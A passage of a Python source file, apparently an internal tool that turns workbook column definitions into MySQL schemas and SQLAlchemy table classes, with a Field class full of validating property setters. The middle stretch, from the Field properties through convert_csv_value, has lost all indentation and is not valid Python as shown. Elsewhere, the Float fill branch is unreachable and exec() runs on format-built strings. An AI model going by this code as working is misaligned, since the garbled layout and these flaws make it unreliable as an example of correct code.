        self.current_tbl_dict = {}
        self.archive_tbl_dict = {}
        self.static_tbl_dict = {}
        PrimaryReportFile.prf_dict[self.sheetname] = self
    # @classmethod
    # def clear_dict(cls):
    #     cls.prf_dict = {}
    @debug(lvl=logging.DEBUG, prefix='')
    def exists(self):
        """Return True when this PRF's MySQL schema already exists."""
        try:
            # SHOW CREATE SCHEMA raises a DBAPI error for unknown schemas.
            server_utils.mysql_engine.execute("SHOW CREATE SCHEMA `{0}`;".format(self.filename)).scalar()
            PrimaryReportFile.logger.log(logging.NOTSET, "Schema Exists: {0}".format(self.filename))
            return True
        except exc.DBAPIError:
            PrimaryReportFile.logger.log(logging.NOTSET, "Schema Does Not Exist: {0}".format(self.filename))
            return False
    @debug(lvl=logging.DEBUG, prefix='')
    def create(self):
        """Create this PRF's MySQL schema (assumes it does not exist)."""
        PrimaryReportFile.logger.log(logging.NOTSET, "Creating Schema: {0}".format(self.filename))
        server_utils.mysql_engine.execute(CreateSchema(self.filename))
    @debug(lvl=logging.DEBUG, prefix='')
    def create_if_not_exists(self):
        """Create the schema only when it is missing."""
        if not self.exists():
            self.create()
    @debug(lvl=logging.DEBUG, prefix='')
    def drop_and_create_tables(self):
        """Drop and recreate every current, archive, and static table."""
        tbl_lst = \
            list(self.current_tbl_dict.values()) + \
            list(self.archive_tbl_dict.values()) + \
            list(self.static_tbl_dict.values())
        for tbl_obj in tbl_lst:
            tbl_obj.drop_and_create_if_not_exists()
        # ARW_PRF_Mapping.InformReflection.prepare(server_utils.mysql_engine)
    @debug(lvl=logging.DEBUG, prefix='')
    def update_schema(self):
        """Reload current tables; append archive tables when their file is newer."""
        for current_tbl_obj in self.current_tbl_dict.values():
            self.session.commit()
            # Current tables are fully replaced on every run.
            current_tbl_obj.truncate()
            current_tbl_obj.append()
        for archive_tbl_obj in self.archive_tbl_dict.values():
            # Only append when the source file's creation time differs from
            # the newest timestamp already loaded into the table.
            create_date = datetime.datetime.strptime(creation_date(archive_tbl_obj.filepath), "%Y-%m-%d %H:%M:%S")
            max_date_time = archive_tbl_obj.max_date_time()
            if create_date != max_date_time:
                archive_tbl_obj.append()
                archive_tbl_obj.delete_sub_max_date_time()
        # for static_tbl_obj in self.static_tbl_dict.values():
        #     pass
        # append static
class Field(object):
    """One column definition parsed from the ARW PRF workbook.

    Every workbook cell is validated through a property setter, and the
    instance can render itself as SQLAlchemy ``Column(...)`` source lines
    (see ``get_create_field``).
    """
    logger = CustomAdapter(logging.getLogger(str(__name__)), None)
    # SQLAlchemy type names accepted in the workbook's "Datatype" column.
    type_list = (
        "BigInteger",
        "Boolean",
        "Date",
        "DateTime",
        "Enum",
        "Float",
        "Integer",
        "Interval",
        "LargeBinary",
        "MatchType",
        "Numeric",
        "PickleType",
        "SchemaType",
        "SmallInteger",
        "String",
        "Text",
        "Time",
        "Unicode",
        "UnicodeText",
        "LONGTEXT"
    )
    @debug(lvl=logging.DEBUG, prefix='')
    def __init__(self,
                 arw_name="",
                 logical_field="",
                 tag="",
                 length="",
                 nested="",
                 desc="",
                 column_name="",
                 data_type="N/A",
                 primary_key="",
                 nullable="",
                 unique="",
                 index="",
                 binary_col="",
                 fill="",
                 auto_incremental="",
                 dflt_exp="",  # Don't need it
                 generated="",  # Don't need it
                 static_key="",  # Don't need it
                 default="",  # Don't need it
                 notes=""):
        """Validate and store all workbook cells for one column.

        NOTE: assignment order below is significant — several property
        setters cross-check attributes set earlier (e.g. ``nullable`` reads
        ``primary_key``; ``fill`` reads ``data_type`` and ``binary_col``;
        ``generated`` reads ``auto_incremental``).  Do not reorder.
        """
        self.arw_name = arw_name  # ARW Name with spaces and such (Column A)
        self.logical_field = logical_field  # If this is true, don't look for this value in the .csv file (Column B)
        self.tag = tag  # ARW Tag (Column C)
        self.length = length  # ARW Length (Not the length associated with datatype) (Column D)
        self.nested = nested  # ARW value (Column E)
        self.desc = desc  # ARW Description of field (Column F)
        # None of the above fields influence the field's status in the DB
        self.column_name = column_name  # My assigned name without spaces (check that this is true in setter)(Column H)
        self.data_type = data_type  # SQL Datatype (convert to SQL Alchemy Datatype) (Column I)
        self.primary_key = primary_key  # Is this a primary key? (Column K)
        self.nullable = nullable  # Is this a NotNull field? (Column L)
        self.unique = unique  # Is this a Unique Index? (Column M)
        self.index = index  # Is this an Index? (Column N)
        self.binary_col = binary_col  # Is this a Binary Column? (Column O)
        self.fill = fill  # Datatype length (Column J)
        self.auto_incremental = auto_incremental  # Is this field Auto-Incremental? (Column R)
        self.generated = generated  # Is this field generated? (Column S)
        self.static_key = static_key  # Is this field a static key? (Column T)
        self.default = default  # Don't really know
        self.dflt_exp = dflt_exp  # What is the default expression for this field? (Only used if generated) (Column W)
        self.notes = notes  # Don't really know (Column X)
        # Pre-render the Column(...) code lines (also logs them).
        self.get_create_field()
# region arw_name ##########################################################################################s######
@property
@debug(lvl=logging.NOTSET)
def arw_name(self):
return self._arw_name
@arw_name.setter
@debug(lvl=logging.NOTSET, prefix="")
def arw_name(self, value):
try:
str_val = str(value)
self._arw_name = str_val.strip()
except ValueError:
raise ValueError("{0}: Value cannot be converted to string: {1}".format("arw_name", value))
# endregion ########################################################################################################
# region logical_field ############################################################################################
@property
@debug(lvl=logging.NOTSET)
def logical_field(self):
return self._logical_field
@logical_field.setter
@debug(lvl=logging.NOTSET, prefix="")
def logical_field(self, value):
try:
str_val = str(value).upper().strip()
if str_val in ("Y", "N"):
self._logical_field = str_val.strip()
else:
raise ValueError("{0}.{1}: Value must be 'Y' or 'N': {2}".
format(self.arw_name, "logical_field", value))
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "logical_field", value))
# endregion ########################################################################################################
# region tag ######################################################################################################
@property
@debug(lvl=logging.NOTSET)
def tag(self):
return self._tag
@tag.setter
@debug(lvl=logging.NOTSET, prefix="")
def tag(self, value):
try:
str_val = str(value)
self._tag = str_val.strip()
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "tag", value))
# endregion ########################################################################################################
# region length ###################################################################################################
@property
@debug(lvl=logging.NOTSET)
def length(self):
return self._length
@length.setter
@debug(lvl=logging.NOTSET, prefix="")
def length(self, value):
try:
int_val = int(value)
self._length = int_val
except ValueError:
try:
str_val = str(value)
if str_val.upper().strip() == "N/A":
self._length = None
else:
raise ValueError("{0}.{1}: Value is not 'N/A': {2}".format(self.arw_name, "length", value))
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to an integer: {2}"
.format(self.arw_name, "length", value))
# endregion ########################################################################################################
# region nested ###################################################################################################
@property
@debug(lvl=logging.NOTSET)
def nested(self):
return self._nested
@nested.setter
@debug(lvl=logging.NOTSET, prefix="")
def nested(self, value):
try:
str_val = str(value)
self._nested = str_val.strip()
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".format(self.arw_name, "nested", value))
# endregion ########################################################################################################
# region desc #####################################################################################################
@property
@debug(lvl=logging.NOTSET)
def desc(self):
return self._desc
@desc.setter
@debug(lvl=logging.NOTSET, prefix="")
def desc(self, value):
try:
str_val = str(value).replace("'", '"').strip()
str_val = ' '.join(str_val.splitlines())
str_val.strip()
self._desc = str_val
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}"
.format(self.arw_name, "desc", value))
# endregion ########################################################################################################
# region column_name ##############################################################################################
@property
@debug(lvl=logging.NOTSET)
def column_name(self):
return self._column_name
@column_name.setter
@debug(lvl=logging.NOTSET, prefix="")
def column_name(self, value):
try:
str_val = str(value).strip()
if len(str_val) > 64:
raise Exception("{0}.{1}: String length greater than the 64 character limit: {2}"
.format(self.arw_name, "column_name", value))
scrubbed_val = str_val.replace("(", "").replace(")", "").replace("/", "").replace("-", "").replace("#", "")
if str_val == scrubbed_val:
try:
int(scrubbed_val[:1])
except ValueError:
self._column_name = scrubbed_val
else:
raise Exception("{0}.{1}: First character of value cannot be a number: {2}"
.format(self.arw_name, "column_name", value))
else:
raise Exception("{0}.{1}: Value has one of the following illegal characters: {{(, ), /, -, #}}: {2}"
.format(self.arw_name, "column_name", value))
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}"
.format(self.arw_name, "column_name", value))
# endregion ########################################################################################################
# region data_type ################################################################################################
@property
@debug(lvl=logging.NOTSET)
def data_type(self):
return self._data_type
@data_type.setter
@debug(lvl=logging.NOTSET, prefix="")
def data_type(self, value):
try:
str_val = str(value)
if str_val.strip() in Field.type_list:
self._data_type = str_val.strip()
else:
raise ValueError("{0}.{1}: Value not in datatype list: {2}"
.format(self.arw_name, "data_type", value))
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}"
.format(self.arw_name, "data_type", value))
# endregion ########################################################################################################
# region fill #####################################################################################################
@property
@debug(lvl=logging.NOTSET)
def fill(self):
return self._fill
@fill.setter
@debug(lvl=logging.NOTSET, prefix="")
def fill(self, value):
if self.data_type in (
"BigInteger",
"Boolean",
"Date",
"DateTime",
"Integer",
"SmallInteger",
"Time",
"Text",
"LONGTEXT"
):
if value not in ("", None):
raise ValueError("{0}.{1}: Datatype does not allow for a fill: {2}"
.format(self.arw_name, "fill", self.data_type))
else:
self._fill = None
elif self.data_type in (
"LargeBinary",
"String",
# "Text",
"Unicode",
"UnicodeText",
"Float"
):
if value in ("", None):
raise ValueError("{0}.{1}: Datatype requires a fill: {2}"
.format(self.arw_name, "fill", self.data_type))
else:
try:
int_val = int(value)
if self.data_type == "String" and self.binary_col:
self._fill = "length={0}, collation='binary'".format(str(int_val))
else:
self._fill = "length={0}".format(str(int_val))
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to an integer: {2}"
.format(self.arw_name, "fill", value))
elif self.data_type == "Float":
try:
int_val = int(value)
self._fill = "precision={0}".format(str(int_val))
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to an integer: {2}"
.format(self.arw_name, "fill", value))
elif self.data_type == "Numeric":
try:
str_val = str(value).strip()
pre_str, scale_str = str_val.split(",")
try:
pre_int = int(pre_str.strip())
scale_int = int(scale_str.strip())
self._fill = "precision={0}, scale={1}".format(str(pre_int), str(scale_int))
except ValueError:
raise ValueError("{0}.{1}: Error with precision or scale integer conversion: "
"precision={2}, scale={3}".
format(self.arw_name, "fill", pre_str, scale_str))
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "fill", value))
elif self.data_type in (
"Enum",
"Interval",
"MatchType",
"PickleType",
"SchemaType"
):
raise ValueError("{0}.{1}: What the fuck are you doing using this datatype?: {2}"
.format(self.arw_name, "fill", self.data_type))
# endregion ########################################################################################################
# region primary_key ##############################################################################################
@property
@debug(lvl=logging.NOTSET)
def primary_key(self):
return self._primary_key
@primary_key.setter
@debug(lvl=logging.NOTSET, prefix="")
def primary_key(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "primary_key", value))
if str_val.strip().upper() == "X":
self._primary_key = True
elif str_val.strip().upper() == "":
self._primary_key = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "primary_key", value))
# endregion ########################################################################################################
# region nullable #################################################################################################
@property
@debug(lvl=logging.NOTSET)
def nullable(self):
return self._nullable
@nullable.setter
@debug(lvl=logging.NOTSET, prefix="")
def nullable(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "nullable", value))
if str_val.strip().upper() == "X":
if not self.primary_key:
self._nullable = True
else:
raise ValueError("{0}.{1}: Primary key cannot be nullable: {2}".
format(self.arw_name, "nullable", value))
elif str_val.strip().upper() == "":
self._nullable = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "nullable", value))
# endregion ########################################################################################################
# region unique ###################################################################################################
@property
@debug(lvl=logging.NOTSET)
def unique(self):
return self._unique
@unique.setter
@debug(lvl=logging.NOTSET, prefix="")
def unique(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "unique", value))
if str_val.strip().upper() == "X":
self._unique = True
elif str_val.strip().upper() == "":
self._unique = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "unique", value))
# endregion ########################################################################################################
# region index ####################################################################################################
@property
@debug(lvl=logging.NOTSET)
def index(self):
return self._index
@index.setter
@debug(lvl=logging.NOTSET, prefix="")
def index(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "index", value))
if str_val.strip().upper() == "X":
self._index = True
elif str_val.strip().upper() == "":
self._index = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "index", value))
# endregion ########################################################################################################
# region binary_col ###############################################################################################
@property
@debug(lvl=logging.NOTSET)
def binary_col(self):
return self._binary_col
@binary_col.setter
@debug(lvl=logging.NOTSET, prefix="")
def binary_col(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "binary_col", value))
if str_val.strip().upper() == "X":
if self.data_type in ("String", "Text"):
self._binary_col = True
else:
raise ValueError("{0}.{1}: Only string and text datatypes can be binary: {2}".
format(self.arw_name, "binary_col", self.data_type))
elif str_val.strip().upper() == "":
self._binary_col = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "binary_col", value))
# endregion ########################################################################################################
# region auto_incremental #########################################################################################
@property
@debug(lvl=logging.NOTSET)
def auto_incremental(self):
return self._auto_incremental
@auto_incremental.setter
@debug(lvl=logging.NOTSET, prefix="")
def auto_incremental(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "auto_incremental", value))
if str_val.strip().upper() == "X":
if self.index and self.data_type in (
"BigInteger",
"Boolean",
"Float",
"Integer",
"Numeric",
"SmallInteger"):
self._auto_incremental = True
else:
raise ValueError("{0}.{1}: Autoincremented columns must be indexed and numeric.".
format(self.arw_name, "auto_incremental"))
elif str_val.strip().upper() == "":
self._auto_incremental = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "auto_incremental", value))
# endregion ########################################################################################################
# region generated ################################################################################################
@property
@debug(lvl=logging.NOTSET)
def generated(self):
return self._generated
@generated.setter
@debug(lvl=logging.NOTSET, prefix="")
def generated(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "generated", value))
if str_val.strip().upper() == "X":
if not self.auto_incremental:
self._generated = True
else:
raise ValueError("{0}.{1}: Value cannot be generated and autoincremented: {2}".
format(self.arw_name, "generated", value))
elif str_val.strip().upper() == "":
self._generated = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "generated", value))
# endregion ########################################################################################################
# region static_key ###############################################################################################
@property
@debug(lvl=logging.NOTSET)
def static_key(self):
return self._static_key
@static_key.setter
@debug(lvl=logging.NOTSET, prefix="")
def static_key(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "static_key", value))
if str_val.strip().upper() == "X":
self._static_key = True
elif str_val.strip().upper() == "":
self._static_key = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "static_key", value))
# endregion ########################################################################################################
# region default ##################################################################################################
@property
@debug(lvl=logging.NOTSET)
def default(self):
return self._default
@default.setter
@debug(lvl=logging.NOTSET, prefix="")
def default(self, value):
if value is None:
str_val = ""
else:
try:
str_val = str(value)
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "default", value))
if str_val.strip().upper() == "X":
self._default = True
elif str_val.strip().upper() == "":
self._default = False
else:
raise ValueError("{0}.{1}: Value must be empty or 'X': {2}".
format(self.arw_name, "default", value))
# endregion ########################################################################################################
# region dflt_exp #################################################################################################
@property
@debug(lvl=logging.NOTSET)
def dflt_exp(self):
return self._dflt_exp
@dflt_exp.setter
@debug(lvl=logging.NOTSET, prefix="")
def dflt_exp(self, value):
try:
str_val = str(value)
self._dflt_exp = str_val.strip()
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "dflt_exp", value))
# endregion ########################################################################################################
# region notes ####################################################################################################
@property
@debug(lvl=logging.NOTSET)
def notes(self):
return self._notes
@notes.setter
@debug(lvl=logging.NOTSET, prefix="")
def notes(self, value):
try:
str_val = str(value)
self._notes = str_val.strip().replace(",", '"')
except ValueError:
raise ValueError("{0}.{1}: Value cannot be converted to string: {2}".
format(self.arw_name, "notes", value))
# endregion ########################################################################################################
@debug(lvl=logging.NOTSET, prefix='')
def get_create_field(self):
code_line_list = []
offset = len("Column(")
code_line_list.append("Column('{column_name}',".format(column_name=self.column_name))
if self.fill not in ("", None):
code_line_list.append(
offset * " " + "{data_type}({fill}),".format(data_type=self.data_type, fill=self.fill))
else:
code_line_list.append(offset * " " + "{data_type},".format(data_type=self.data_type))
if self.primary_key:
code_line_list.append(offset * " " + "primary_key=True,")
if self.nullable:
code_line_list.append(offset * " " + "nullable=True,")
if self.index and self.unique:
code_line_list.append(offset * " " + "unique=True,")
code_line_list.append(offset * " " + "index=True,")
else:
if self.index and not self.unique:
code_line_list.append(offset * " " + "index=True,")
if self.unique and not self.index:
code_line_list.append(offset * " " + "unique=True,")
code_line_list.append(offset * " " + "index=True,")
if self.auto_incremental:
code_line_list.append(offset * " " + "autoincrement=True,")
if self.notes not in ("", None):
code_line_list.append(offset * " " + "doc='{notes}',".format(notes=self.notes))
if self.desc not in ("", None):
max_length = 79
fmt_string = textwrap.wrap(self.desc, max_length)
fmt_str_len = len(fmt_string)
for count, line in enumerate(fmt_string, 1):
if count == 1:
if count == fmt_str_len:
code_line_list.append(
offset * " " + "comment='{description}',".format(description=line.strip()))
else:
code_line_list.append(offset * " " + "comment='{description}'".format(description=line.strip()))
elif count == fmt_str_len:
code_line_list.append(offset * " " + " '{description}',".format(description=line.strip()))
else:
code_line_list.append(offset * " " + " '{description}'".format(description=line.strip()))
if not self.generated:
if self.dflt_exp not in (None, "", "None"):
if isinstance(self.dflt_exp, str):
code_line_list.append(offset * " " + "default='{dflt_exp}', ".format(dflt_exp=self.dflt_exp))
else:
Field.logger.log(logging.ERROR, "Figure out what to do with int/float generated columns: {0}"
.format(self.arw_name))
elif self.generated:
if self.dflt_exp in (None, ""):
Field.logger.log(logging.ERROR, "Generated without default expression: {0}".format(self.arw_name))
elif self.dflt_exp not in (None, ""):
code_line_list = []
for line in self.dflt_exp.splitlines():
code_line_list.append("{0}".format(line.replace(" ", " ")))
Field.logger.log(logging.NOTSET, "Code:")
for line in code_line_list:
Field.logger.log(logging.NOTSET, " {code_line}".format(code_line=line))
return code_line_list
final_code_list = []
code_list_len = len(code_line_list)
for line in code_line_list[0:code_list_len - 1]:
final_code_list.append(line)
final_line = code_line_list[code_list_len - 1][:-1] + "),"
final_code_list.append(code_line_list[code_list_len - 1][:-1] + "),")
Field.logger.log(logging.NOTSET, "Code:")
for line in final_code_list:
Field.logger.log(logging.NOTSET, " {code_line}".format(code_line=line))
return final_code_list
@debug(lvl=logging.NOTSET, prefix='')
def convert_csv_value(self, csv_string):
formatted_value = "Unassigned Error"
if csv_string == '':
formatted_value = None
Field.logger.log(logging.NOTSET, "CSV String: {csv_string}, Formatted Value: {formatted_value}".
format(csv_string=csv_string, formatted_value=formatted_value))
else:
if self.data_type in ("Text", "String", "Unicode", "UnicodeText"):
try:
formatted_value = str(csv_string)
except ValueError:
formatted_value = "Error converting to string"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
elif self.data_type in ("BigInteger", "Integer", "SmallInteger"):
try:
formatted_value = int(csv_string)
except ValueError:
formatted_value = "Error converting to an integer"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
elif self.data_type in ("Numeric", "Float"):
try:
formatted_value = float(csv_string)
except ValueError:
formatted_value = "Error converting to a float"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
elif self.data_type == "Boolean":
if csv_string.strip().upper() == "FALSE":
formatted_value = False
elif csv_string.strip().upper() == "TRUE":
formatted_value = True
else:
formatted_value = "Error converting to a boolean"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
elif self.data_type in ("LargeBinary", "Enum", "Interval", "MatchType", "PickleType", "SchemaType"):
formatted_value = "Unmapped Datatype"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
elif self.data_type == "DateTime":
try:
formatted_value = csv_string
except ValueError:
formatted_value = "Date Conversion Error"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
elif self.data_type == "Date":
try:
formatted_value = datetime.datetime.strptime(csv_string, "%m/%d/%Y").date()
except ValueError:
formatted_value = "Date Conversion Error"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
elif self.data_type == "Time":
try:
formatted_value = datetime.datetime.strptime(csv_string, "%I:%M%p").time()
except ValueError:
formatted_value = "Date Conversion Error"
Field.logger.log(
logging.ERROR,
"ARW Name: {arw_name}, Column Name: {column_name}, "
"CSV Value: {csv_string}, Datatype: {data_type}".format(
arw_name=self.arw_name,
column_name=self.column_name,
csv_string=csv_string,
data_type=self.data_type))
return formatted_value
class ConsoleTable(object):
    """One MySQL table managed by the price-console tooling.

    Holds the table's Field objects (keyed by field order) and builds two
    pieces of Python source text from them: a reflection-based mapping class
    (``mapping_stmt``) and a full column-by-column creation class
    (``creation_stmt``).  Also provides create/drop/truncate helpers that act
    on the live server via ``server_utils.mysql_engine``.
    """
    logger = CustomAdapter(logging.getLogger(str(__name__)), None)
    @debug(lvl=logging.NOTSET, prefix='Table Initiated')
    def __init__(self,
                 session,
                 prf_name,
                 prf_col,
                 base_table_name,
                 table_name=None):
        # session: SQLAlchemy session used by subclasses when loading data.
        # prf_name: schema name; prf_col: column metadata for the PRF report.
        self.session = session
        self.prf_name = prf_name
        self.prf_col = prf_col
        self.base_table_name = base_table_name
        self.table_name = table_name
        self._mapping_stmt = None
        self._creation_stmt = None
        self.fields = {}  # field order (int-convertible key) -> Field object
    # region base_table_name ##########################################################################################
    @property
    @debug(lvl=logging.NOTSET)
    def base_table_name(self):
        """Lower-cased name of the base table this table derives from."""
        return self._base_table_name
    @base_table_name.setter
    @debug(lvl=logging.NOTSET, prefix="")
    def base_table_name(self, value):
        try:
            str_value = str(value).lower()
        except ValueError:
            raise ValueError("{0}: Value cannot be converted to string: {1}".format("base_table_name", value))
        else:
            self._base_table_name = str_value
    # endregion ########################################################################################################
    # region table_name ##########################################################################################
    @property
    @debug(lvl=logging.NOTSET)
    def table_name(self):
        """Lower-cased physical table name."""
        return self._table_name
    @table_name.setter
    @debug(lvl=logging.NOTSET, prefix="")
    def table_name(self, value):
        try:
            str_value = str(value).lower()
        except ValueError:
            raise ValueError("{0}: Value cannot be converted to string: {1}".format("table_name", value))
        else:
            self._table_name = str_value
            # Renaming the table invalidates previously generated statements.
            self.map = None
            self.create = None
    # endregion ########################################################################################################
    # region prf_name #################################################################################################
    @property
    @debug(lvl=logging.NOTSET)
    def prf_name(self):
        """Lower-cased schema (database) name this table lives in."""
        return self._prf_name
    @prf_name.setter
    @debug(lvl=logging.NOTSET)
    def prf_name(self, value):
        try:
            str_value = str(value).lower()
        except ValueError:
            raise ValueError("{0}: Value cannot be converted to string: {1}".format("prf_name", value))
        else:
            self._prf_name = str_value
    # endregion ########################################################################################################
    # region mapping_stmt ##########################################################################################
    @property
    @debug(lvl=logging.NOTSET)
    def mapping_stmt(self):
        """Generated source for the reflection-based mapping class."""
        return self._mapping_stmt
    @mapping_stmt.setter
    @debug(lvl=logging.NOTSET)
    def mapping_stmt(self, _):
        # Setter ignores its argument: it rebuilds the statement from
        # self.fields (assign any value to trigger regeneration).
        if bool(self.fields):
            gen_field_lst = []
            code = "# noinspection PyPep8Naming\n"
            code += "class {table_name}({reflection}):\n" \
                .format(table_name=self.table_name, reflection="InformReflection")
            code += " " * 4 + "__table__ = Table('{table_name}', {base_name}.metadata,\n".format(
                table_name=self.table_name,
                base_name="server_utils.mysql_base"
            )
            # Reflection supplies ordinary columns; only generated columns
            # with a default expression need explicit code.
            for field_order in sorted(self.fields.keys(), key=lambda x: int(x)):
                field_obj = self.fields.get(field_order)
                if field_obj.generated and field_obj.dflt_exp not in (None, "", "None"):
                    gen_field_lst.append(field_obj)
            code += " " * 22 + "schema='{schema_name}')\n".format(schema_name=self.prf_name)
            if bool(gen_field_lst):
                for field_obj in gen_field_lst:
                    code += "\n"
                    gen_code_lst = field_obj.get_create_field()
                    for line in gen_code_lst:
                        code += " " + line + "\n"
                code += "\n"
            self._mapping_stmt = code
        elif not bool(self.fields):
            raise NotImplementedError
    # endregion ########################################################################################################
    # region creation_stmt ##########################################################################################
    @property
    @debug(lvl=logging.NOTSET)
    def creation_stmt(self):
        """Generated source for the explicit column-by-column class."""
        return self._creation_stmt
    @creation_stmt.setter
    @debug(lvl=logging.NOTSET)
    def creation_stmt(self, _):
        # Setter ignores its argument (see mapping_stmt); every field's
        # Column(...) code is emitted inline here.
        if bool(self.fields):
            gen_field_lst = []
            offset = 22
            code = "# noinspection PyPep8Naming\n"
            code += "class {0}(server_utils.mysql_base):\n" \
                .format(self.table_name)
            code += " " * 4 + "__table__ = Table('{table_name}', {base_name}.metadata,\n".format(
                table_name=self.table_name,
                base_name="server_utils.mysql_base"
            )
            for field_order in sorted(self.fields.keys(), key=lambda x: int(x)):
                field_obj = self.fields.get(field_order)
                if field_obj.generated and field_obj.dflt_exp not in (None, "", "None"):
                    gen_field_lst.append(field_obj)
                else:
                    code_lst = field_obj.get_create_field()
                    for line in code_lst:
                        code += " " * offset + line + "\n"
            code += " " * offset + "schema='{schema_name}')\n".format(schema_name=self.prf_name)
            if bool(gen_field_lst):
                for field_obj in gen_field_lst:
                    code += "\n"
                    gen_code_lst = field_obj.get_create_field()
                    for line in gen_code_lst:
                        code += " " + line + "\n"
                code += "\n"
            self._creation_stmt = code
        elif not bool(self.fields):
            raise NotImplementedError
    # endregion ########################################################################################################
    # noinspection PyAttributeOutsideInit
    @debug(lvl=logging.NOTSET, prefix='')
    def post_field_instantiation(self):
        """Regenerate both statements once all fields have been added."""
        self.mapping_stmt = None
        self.creation_stmt = None
    @debug(lvl=logging.DEBUG, prefix='')
    def exists(self):
        """Return True if the table exists in the target schema."""
        if not server_utils.mysql_engine.dialect.has_table(
                server_utils.mysql_engine,
                self.table_name,
                schema=self.prf_name):
            ConsoleTable.logger.log(
                logging.NOTSET,
                "Table does not exist: {0}.{1}".format(self.prf_name, self.table_name)
            )
            return False
        else:
            ConsoleTable.logger.log(logging.NOTSET, "Table exists: {0}.{1}".format(self.prf_name, self.table_name))
            return True
    @debug(lvl=logging.DEBUG, prefix='')
    def create_a(self):
        """Create the table via the mapped class in creation_module.

        exec() is used because the mapped class is looked up by its dynamic
        table name at runtime.
        """
        statement = "creation_module.{table_name}.__table__.create({engine_name})" \
            .format(table_name=self.table_name,
                    engine_name="server_utils.mysql_engine")
        ConsoleTable.logger.log(logging.NOTSET, "{schema_name}.{table_name} Create Statement: {statement}".
                                format(schema_name=self.prf_name,
                                       table_name=self.table_name,
                                       statement=statement))
        exec(statement)
    @debug(lvl=logging.DEBUG, prefix='')
    def drop(self):
        """Drop the table via the mapped class in creation_module (see create_a)."""
        statement = "creation_module.{table_name}.__table__.drop({engine_name})" \
            .format(table_name=self.table_name,
                    engine_name="server_utils.mysql_engine")
        ConsoleTable.logger.log(logging.DEBUG, "{schema_name}.{table_name} Drop Statement: {statement}".
                                format(schema_name=self.prf_name,
                                       table_name=self.table_name,
                                       statement=statement))
        exec(statement)
    @debug(lvl=logging.DEBUG, prefix='')
    def truncate(self):
        """Empty the table with raw TRUNCATE (faster than row-wise DELETE)."""
        statement = ("TRUNCATE `{schema_name}`.`{table_name}`;".format(schema_name=self.prf_name,
                                                                       table_name=self.table_name))
        ConsoleTable.logger.log(logging.NOTSET, "{schema_name}.{table_name} Truncate Statement: {statement}".
